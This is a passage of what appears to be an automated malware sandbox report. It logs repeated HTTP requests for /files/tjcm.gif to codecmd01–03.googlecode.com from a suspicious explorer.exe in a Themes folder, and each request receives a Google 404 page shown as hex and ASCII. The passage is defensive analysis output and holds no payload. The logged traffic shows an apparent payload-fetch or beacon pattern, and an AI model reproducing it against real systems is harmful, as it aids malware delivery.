6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                                                                                                                Jul 16, 2022 23:58:00.932960033 CEST2673INData Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                2192.168.2.549791142.250.102.8280C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Jul 16, 2022 23:57:24.371624947 CEST1525OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Host: codecmd02.googlecode.com
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Jul 16, 2022 23:57:24.399090052 CEST1527INHTTP/1.1 404 Not Found
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                Content-Length: 1575
                                                                                                                                                                                Date: Sat, 16 Jul 2022 21:57:24 GMT
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                                                                                                                Jul 16, 2022 23:57:24.399126053 CEST1527INData Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                20192.168.2.549872142.250.102.8280C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Jul 16, 2022 23:58:03.656693935 CEST2674OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Host: codecmd03.googlecode.com
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Jul 16, 2022 23:58:03.683681965 CEST2675INHTTP/1.1 404 Not Found
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                Content-Length: 1575
                                                                                                                                                                                Date: Sat, 16 Jul 2022 21:58:03 GMT
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                                                                                                                Jul 16, 2022 23:58:03.683696032 CEST2676INData Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                21192.168.2.549873142.250.102.8280C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Jul 16, 2022 23:58:05.836945057 CEST2677OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Host: codecmd01.googlecode.com
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Jul 16, 2022 23:58:05.863981009 CEST2678INHTTP/1.1 404 Not Found
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                Content-Length: 1575
                                                                                                                                                                                Date: Sat, 16 Jul 2022 21:58:05 GMT
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                                                                                                                Jul 16, 2022 23:58:05.864008904 CEST2678INData Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                22192.168.2.549874142.250.102.8280C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Jul 16, 2022 23:58:07.158910990 CEST2679OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Host: codecmd02.googlecode.com
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Jul 16, 2022 23:58:07.186203957 CEST2681INHTTP/1.1 404 Not Found
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                Content-Length: 1575
                                                                                                                                                                                Date: Sat, 16 Jul 2022 21:58:07 GMT
